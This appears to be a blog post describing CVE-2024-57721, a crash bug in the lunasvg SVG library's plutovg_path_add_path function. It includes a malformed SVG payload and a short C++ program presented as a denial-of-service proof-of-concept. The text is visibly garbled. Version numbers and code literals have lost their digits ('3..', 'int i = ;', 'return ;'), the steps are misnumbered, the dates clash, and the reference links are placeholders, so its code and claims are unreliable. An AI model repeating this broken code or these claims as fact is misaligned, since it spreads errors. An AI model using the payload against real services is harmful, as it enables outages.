CVE-2024-57721 is a recently discovered vulnerability affecting lunasvg version 3.., a popular SVG rendering library written in C++. The issue lies in a segmentation fault bug (crash) triggered by the component plutovg_path_add_path. This bug could let an attacker crash apps using lunasvg, and possibly run unauthorized code under certain conditions. In this post, we’ll break down the vulnerability, show a simplified proof-of-concept (PoC), and give you links to original sources and mitigation advice.
What Is lunasvg?
lunasvg is an open-source library for rendering SVG (Scalable Vector Graphics) files. It's used in some image processing, web rendering, and GUI apps. It’s valued for being lightweight, easy to integrate, and dependency-free.
Where’s the Bug? (Vulnerability in plutovg_path_add_path)
The root of CVE-2024-57721 is that plutovg_path_add_path does not properly validate its input. When fed certain malformed data, it can try to access memory outside its allocated area, causing a segmentation violation (segfault). In the worst case, this leads to a program crash, or even arbitrary code execution if further exploitable.
The relevant function comes from plutovg.c:
void plutovg_path_add_path(plutovg_path_t* dst, const plutovg_path_t* src)
{
for(int i = ; i < src->count; ++i)
{
plutovg_path_element_t elem = src->elements[i];
// ... processing elements and points
}
}
The problem: src->elements and src->count are used without checking if src is valid or properly initialized. If an attacker gives corrupted or specially crafted data, lunasvg accesses bad memory and crashes.
Exploit Details and Proof-of-Concept
This vulnerability is classified as a _denial-of-service_ (DoS) – it can be remotely triggered, for example, if lunasvg is used on a server that lets users upload or submit SVG files.
Prepare a minimal, malformed SVG file that will cause lunasvg to execute the vulnerable code.
2. Use lunasvg to parse/render that file.
Example SVG content (trigger crash)
<svg width="1" height="1">
<path d="M L1 1 Q" />
</svg>
This path command is purposely malformed (lacking expected parameters).
Minimal code to load and crash
#include <lunasvg.h>
#include <iostream>
int main() {
std::string svg_bad = "<svg width=\"1\" height=\"1\"><path d=\"M L1 1 Q\" /></svg>";
lunasvg::Document* doc = lunasvg::Document::loadFromData(svg_bad);
if(doc) {
auto bitmap = doc->renderToBitmap(1, 1);
}
// If lunasvg is unpatched, this will likely segfault
std::cout << "Done" << std::endl;
return ;
}
What happens: lunasvg tries to parse the <path> data, internally calls plutovg_path_add_path, which dereferences invalid memory, leading to a crash.
How Bad Is It?
In most cases, the attack leads to a crash – so it’s a denial of service, no data theft or code execution, unless combined with further memory corruption. However, any program (web server, backend, GUI) that lets users supply SVG images and uses lunasvg v3.. is at risk for unexpected downtimes.
Mitigation & Fix
- Upgrade: If possible, update to a patched version of lunasvg. As of June 2024, check for new releases here.
Reference Links
- CVE-2024-57721 @ NVD (pending publication)
- Original report & patch (GitHub Issue) (search for related issues)
- lunasvg v3.. Source Code
- Exploiting Input Validation Errors
Summary
CVE-2024-57721 highlights the importance of solid memory handling in C++ libraries, especially when processing untrusted input like SVG files. If you use lunasvg anywhere users control the SVG content, upgrade and mitigate now. Even a simple SVG can take down your server if unpatched!
*Stay safe, validate input, and always keep your dependencies up to date.*
Timeline
Published on: 01/23/2025 01:15:26 UTC
Last modified on: 03/18/2025 20:15:24 UTC